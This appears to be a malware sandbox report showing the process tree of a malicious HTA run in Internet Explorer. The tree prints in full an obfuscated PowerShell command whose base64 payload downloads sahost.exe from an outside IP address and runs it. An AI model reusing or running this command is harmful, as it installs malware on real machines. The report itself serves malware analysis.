| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\IEnetcats.hta.html
2612
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409
  2700
  - cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWERsheLl -Ex byPASS -nOp -W 1 -C dEviCECreDenTIALDEpLOYMent.ExE ; Iex($(IEx('[SystEM.tExT.EncODING]'+[CHAR]58+[char]58+'UTf8.getstriNG([SYSTEM.CoNvERt]'+[ChAr]0x3a+[CHAR]0x3a+'FroMBaSe64STrInG('+[ChAR]34+'JDczRWZiU2N1dHRmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJlcmRlZmlOSVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWkR0dW10Q3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgakpjLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtvaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVtTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJGV0NFR25IdHYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZVNwQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTbEZrSHRVeE8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3M0VmYlNjdXR0Zjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuMzEuMTI0Lzk4L3NhaG9zdC5leGUiLCIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSIsMCwwKTtTdGFyVC1zTGVFcCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzYWhvc3QuZXhlIg=='+[chAR]34+'))')))"
    2940
    - powershell.exe PoWERsheLl -Ex byPASS -nOp -W 1 -C dEviCECreDenTIALDEpLOYMent.ExE ; Iex($(IEx('[SystEM.tExT.EncODING]'+[CHAR]58+[char]58+'UTf8.getstriNG([SYSTEM.CoNvERt]'+[ChAr]0x3a+[CHAR]0x3a+'FroMBaSe64STrInG('+[ChAR]34+'JDczRWZiU2N1dHRmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJlcmRlZmlOSVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWkR0dW10Q3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgakpjLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtvaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVtTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJGV0NFR25IdHYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZVNwQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTbEZrSHRVeE8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3M0VmYlNjdXR0Zjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuMzEuMTI0Lzk4L3NhaG9zdC5leGUiLCIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSIsMCwwKTtTdGFyVC1zTGVFcCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzYWhvc3QuZXhlIg=='+[chAR]34+'))')))"
      3000
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\3xsesmxu.cmdline"
        2412
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESB0FC.tmp" "c:\Users\test22\AppData\Local\Temp\CSCB05F.tmp"
        2504

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents